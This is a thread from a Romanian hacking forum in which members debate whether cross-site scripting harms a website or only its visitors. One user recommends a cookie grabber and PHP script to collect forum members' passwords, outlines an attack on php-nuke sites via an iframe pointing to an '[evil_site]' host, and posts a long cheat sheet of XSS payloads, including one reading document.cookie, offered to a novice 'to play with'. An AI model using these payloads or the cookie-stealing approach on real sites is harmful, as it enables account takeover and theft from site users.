Hacking and more...
HaCkinG CulT 		Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat. 		Nou pe simpatie:
dany_frumusik
Femeie
24 ani
Constanta
cauta Barbat
24 - 56 ani
Hacking and more... / Hacking-ul nostru cel de toate zilele / lamurire XSS Moderat de Shocker
Autor
Mesaj Pagini: 1
BlacKStorM
Elite Member

Inregistrat: acum 17 ani
Postari: 523
cu ce e afectat un site ca asta    in momentul in care se gaseste un XSS?
cum se mai poate exploata acest XSS?poti pune un XSS in pagina principala sau asta ar insemna aflarea parolei serverului si multe altele...vreau niste detalii...thx       si niste turotiale de XSS ca in functia de cautare la forum imi da vreo 45 de pagini....poate aveti ceva pe rapidshare sau altele...puneti niste linkuri...

_______________________________________
REVIN IN OCTOMBRIE...bafta la toti
pus acum 17 ani
   
s3lf
Junior+

Inregistrat: acum 17 ani
Postari: 34
exploata XSS? -> foloseste un script,un cookie grabber iar daca site-ul respectiv nu e patchat atunci vei avea satisfactie

Modificat de s3lf (acum 17 ani)
pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
s3lf , no shit ! :O
squad.queen sa-ti spun cum e afectat...pai..il cam doare in fund pe domnul website ca ai gasit tu xss in el,xss - cross  site scripting - nu poti face rau websiteului cu asa ceva

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
s3lf
Junior+

Inregistrat: acum 17 ani
Postari: 34

Sad_Dreamer a scris:

s3lf , no shit ! :O
squad.queen sa-ti spun cum e afectat...pai..il cam doare in fund pe domnul website ca ai gasit tu xss in el,xss - cross  site scripting - nu poti face rau websiteului cu asa ceva


de ce esti asa sigur ca nu poti face nimik cu un XSS...? zimi te rog. Probabil tu nu poti face nimik dar sunt destui care stiu profita, folosind un cookie grabber un spatziu web personal si un script in php poti avea toate parolele membrilor din acel forum sau site..e mult de explicat cum functioneaza unor persoane care nu stiu ce e un XSS Oricum exista deja pe Sfantul Google destule tutoriale si chiar video despre cum poti rupe un site cu un
bug cross site scripting!

NU vreau sa te contrazic ci doar sa precizez 

pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
nu ma contrazici,dar vorbesti aiurea,toate? esti asa sigur? xss = atacuri asupra browserelor,nu a siteului.

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
s3lf
Junior+

Inregistrat: acum 17 ani
Postari: 34
vezi ca am ajuns la contrazis   OK fie cum spuit tu....dar br0 nu am zis nicaieri ca e un atac asupra unui site ci doar ca acel xss va fi in acel oarecare site  pt ca ne avand un site unde drec vei folosi metoda de atac? LOL

acum iti dau si un exemplu SIMPLU si STUPID nu doar tie ci si baiatului de sus care intreba....avand in vedere ca toate versiunile de php-nuke au acest bug cautati un site "powered by php-nuke" in google....apoi normal un script ca de ex   

<script>alert(" hacking "</script>   si salvatil in format gif. ,uploadatzi acel script in web iar apoi cautatzi un frame in modules search din site-ul php.nuke folosind comanda

<iframe src=http://[evil_site]/img.gif <   si deschidetzi cu IE

Modificat de s3lf (acum 17 ani)
pus acum 17 ani
   
Xtr3M.
elite user

Din: fata monitorului
Inregistrat: acum 17 ani
Postari: 1015

<script>alert(" hacking "</script>

din cate stiu eu e <script>alert("hacking";</script>

_______________________________________
e-mail: xtr3m[at]pscomp[DOT]com
pus acum 17 ani
   
BlacKStorM
Elite Member

Inregistrat: acum 17 ani
Postari: 523
thx    

_______________________________________
REVIN IN OCTOMBRIE...bafta la toti
pus acum 17 ani
   
s3lf
Junior+

Inregistrat: acum 17 ani
Postari: 34

Xtr3M. a scris:


<script>alert(" hacking "</script>

din cate stiu eu e <script>alert("hacking";</script>


am scris corect n3n3 doar ca apare acel smiley  oricum se stie ca e )
pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
s3lf ...poti s-o urci si on top of the world imaginea aia,daca adminul nu da click sau nu intra pe linkul tau iti poti baga xss-ul in fund,nu afecteaza siteul 

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
s3lf
Junior+

Inregistrat: acum 17 ani
Postari: 34
squad.queen a cerut o lamurie... eu i-am dat un exemplu simplu....nimik mai mult....dar daca cunoaste stie ca mai exista si altele...iar voi hackeri aici ar trebui sa dati  exemple nu dezamagiri  n00bilor,sau sa tineti informatiile doar pt voi ...asta in caz ca aveti vreuna asupra XSS-ului ala de care spui tu ca inutil(ia gandestete cate site sunt pe net? care sufera de problema cross site scripting,si mai gandestete OARE cati admini sunt asa de cunoscatori ca tine...ca sa nu dea click pe link?!) hai ca e inutil sa ne contrazicem ,deja suntem offtopic,ar fi bine ca  cineva sa inkida.  
Stiu ca vrei sa ai mereu dreptate ,doar esti moderator ,dar aici nu vad cum ai putea avea din moment ce  tu imi spui lucruri citite sau auzite pe alte forumuri si deloc practicate.

squad.queen ia si astea daca mai doresti sa te joci ..


<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#x22;&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x50;&#x4C;&#x41;&#x59;&#x48;
&#x41;&#x43;&#x4B;&#x2E;&#x4E;&#x45;&#x54;&#x27;&#x29;&#x22;>

<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">

<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS";//<</SCRIPT>

<iframe src=http://example.com/scriptlet.html <

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert(document.cookie)>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<BR SIZE="&{alert('XSS')}">

<IMG SRC='vbscript:msgbox("XSS"'>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="width: expression(alert('XSS'));">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')"}</STYLE>

<?='<SCRIPT>alert("XSS"</SCRIPT>'?>

<A HREF="javascript:document.location='http://www.example.com/'">XSS</A> 

Nu confundatzi XSS cu CSS (Cascading Style Sheets)   

scuze ADMINISTRATORILOR,nu am folosit cuvinte vulgare si nici nu am  umilit pa nimeni 

Modificat de s3lf (acum 17 ani)
pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
s3lf daca nu 'practicam' nu ma bagam,cred ca ai folosit vreodata un xss in yahoo de a face rost de parola,acum...nah..explica-mi si mie..prin xss-ul ala in yahoo,cum faceai rau la website ?! sau xss-ul gasim in microsoft,nu poti face rau,got it?nu toate websiteurile folosesc cookies,si daca gasesti xss in ele gasesti degeaba,intelegi acum ?

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
Xtr3M.
elite user

Din: fata monitorului
Inregistrat: acum 17 ani
Postari: 1015
cred ca v-ar face bine amandurora o mica lectura:

In general, cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim. sursa:http://www.acunetix.com/websitesecurity/cross-site-scripting.htm

Deci An** fu****, xss-urile ataca userii, nu si siteul!

Modificat de Xtr3M. (acum 17 ani)

_______________________________________
e-mail: xtr3m[at]pscomp[DOT]com
pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
asta am zis si eu mai sus.

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
s3lf
Junior+

Inregistrat: acum 17 ani
Postari: 34
  nu e nimik de citit,e nevoie de practica



Modificat de s3lf (acum 17 ani)
pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
esti penibil,daca vrei sa te lauzi exista sectiunea HACKED,aici incercam sa dam niste raspunsuri BUNE si ADEVARATE userilor,daca nu esti in stare,cara-te

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
s3lf
Junior+

Inregistrat: acum 17 ani
Postari: 34

Sad_Dreamer a scris:

esti penibil,daca vrei sa te lauzi exista sectiunea HACKED,aici incercam sa dam niste raspunsuri BUNE si ADEVARATE userilor,daca nu esti in stare,cara-te


RASPUNSURI -de ce nu esti capabil sa le dai? crezi ca dand copy paste de pe alte forumuri te face bun?
de ce nu ma mira faptul ca tot ce vad aici vad si pe undeva? as putea sa va arat o multime de posturi la fel,postate de aceiasi persoana aici cat si dincolo....
LAUDA- nu vad motivul si interesul sa ma laud cu un amarat de xss,..poate mi-l spui tu ?!

am pus doar o singura intrebare la sectiunea exploit si poc....chiar daca o stiam,normal...dar am puso cu intente ,doar ca sa vad situatia hackingului din romania...

e dezastru frate,cel putin din cate vad eu,   daca stau bine si ma uit nu vad decat

cum sparg un id yahoo
cum fur parole msn
cum fac un scam
cum fut un server
cum pot afla...

eu ma intreb la ce ajuta aceste forumuri avand in vedere ca numarul de lammeri creste din zi in zi,
intratzi si voi pe alte forumuri de hack din romania si va veti convinge ca toate sunt la fel ! Fratzilor nu  va spun asta cu ura ci doar pt a va deschide ochii ca

prin hacking nu se intelege doar
SQL
RFI
XSS

PREA MULTE informatzii aruncate ca si pa "tava" lammerilor, oare nu pot fi periculoase?

scuze adminilor,nu e de luat in nume de rau...oricum voi stiti mersul

pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
sa vorbim de raspunsuri,citeste ce a intrebat queen in primul post,si ce i-ai raspuns tu,ALA TI SE PARE RASPUNS BUN?
si..e doar practica? sa inteleg ca tu sti deja ce zice asta aici ?!?

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
srdjan
Grand Master

Din: Arad
Inregistrat: acum 17 ani
Postari: 337
1: queen pana nu incearca nu va intelege... am eu convingerea
2: situ e site... useru e user... dar ambii au date... daca gasesti legatura intre ele... direct sau indirect plecand de la xss poti ataca nu doar situ ci si serveru
3: .(<-----punct |cu cearta ca e directia gresita...|)
LE: AVIZ MODERATORILOR: propun sa se faca un board dedicat certurilor ca sa nu le mai gasim peste tot

_______________________________________
In God I trust... all others please send me md5 sum-checks
pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602

srdjan a scris:

1: queen pana nu incearca nu va intelege... am eu convingerea

WORD.
dar tre' sa si citeasca inainte,sa inteleaga ce si cum

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
Nemessis
Senior

Inregistrat: acum 17 ani
Postari: 129

Sad_Dreamer a scris:

s3lf , no shit ! :O
squad.queen sa-ti spun cum e afectat...pai..il cam doare in fund pe domnul website ca ai gasit tu xss in el,xss - cross  site scripting - nu poti face rau websiteului cu asa ceva


Daca exista un board cu o astfel de problema si tu postezi un script ce te redirectioneaza automat catre alta pagina? Atunci cred ca nu il mai doare in fund pe domnul admin. Daca pui intr-un shoutbox sa zicem un script care da eroare la browser si ti-l inchide sau te trimite la mama dracului pe alt site exista deja o mare problema. O fi local si are impact doar asupra browserelor dar atata timp cat afecteaza si navigarea pe website este totusi mai mult decat neplacut. Dar... nu se aplica la orice gen de xss, insa poate deveni o mare durere de cap in anumite cazuri

Modificat de Nemessis (acum 17 ani)

_______________________________________
Hackerul de romania (descriere) -
pus acum 17 ani
   
srdjan
Grand Master

Din: Arad
Inregistrat: acum 17 ani
Postari: 337
pentru o mai buna intelegere sa caute xss pe wikipedia... sunt explicate binisor toate cele 3 tipuri de vulnerabilitati xss

_______________________________________
In God I trust... all others please send me md5 sum-checks
pus acum 17 ani
   
BlacKStorM
Elite Member

Inregistrat: acum 17 ani
Postari: 523
kiar nu ma asteptam la atatea raspunsuri pentru o nimica toata...dar !)x a lot...    

_______________________________________
REVIN IN OCTOMBRIE...bafta la toti
pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
da nemessis,dar e doar asupra browserului,eu am zis ca-l doare in fund pe nenea admin ca nu-i poti face deface la website sau alte cacaturi prin xss.

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
KILLER.Reloaded
Elite Member

Inregistrat: acum 17 ani
Postari: 721
@Sad_Dreamer: arunca o privire in sectiunea "Reclamatii".


Modificat de KILLER.Reloaded (acum 17 ani)
pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
exact.si unde e problema ( atacul ^ ^ ) ? la browser sau la site?

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t
pus acum 17 ani
   
Pagini: 1  

Mergi la